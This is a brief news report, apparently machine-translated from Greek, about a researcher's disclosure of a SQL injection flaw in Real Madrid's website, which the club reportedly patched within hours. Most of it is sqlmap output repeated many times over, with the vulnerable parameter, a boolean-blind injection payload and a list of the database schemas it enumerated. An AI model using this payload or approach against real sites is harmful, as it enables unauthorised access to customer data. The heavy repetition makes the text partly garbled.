A Greek researcher managed to identify a major security gap in Real Madrid's official website that allowed him to execute SQL injection successfully and access the team database.
On October 10, the Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
Η cooperation she was flawless and prompt and the problem was fixed within a few hours.
It is worth noting that the base of the website had over 7.000 tables and many important items such as millions of customer accounts from the official store of the team.
Some vulnerability information:
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table] + ——————————– +
| RLM $ PARSEDCOND |
+ ——————————– +
Database: XDB
[2 tables] + ——————————– +
| XDB $ IMPORT_TT_INFO |
| XDB $ XIDX_IMP_T |
+ ——————————– +
Database: APEX_030200
[3 tables] + ——————————– +
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+ ——————————– +
Database: SYSTEM
[4 tables] + ——————————– +
| HELP |
| OL $ |
| OL $ HINTS |
| OL $ NODES |
+ ——————————– +
Database: FATWIREDLV
[3437 tables] + ——————————– +
Database: SYS
[26 tables] + ——————————– +
Database: MDSYS
[35 tables] + ——————————– +
Η information for vulnerabilities discovered in organizations is considered highly necessary
(especially when they exist on high-traffic websites), and for us they are immediate priority.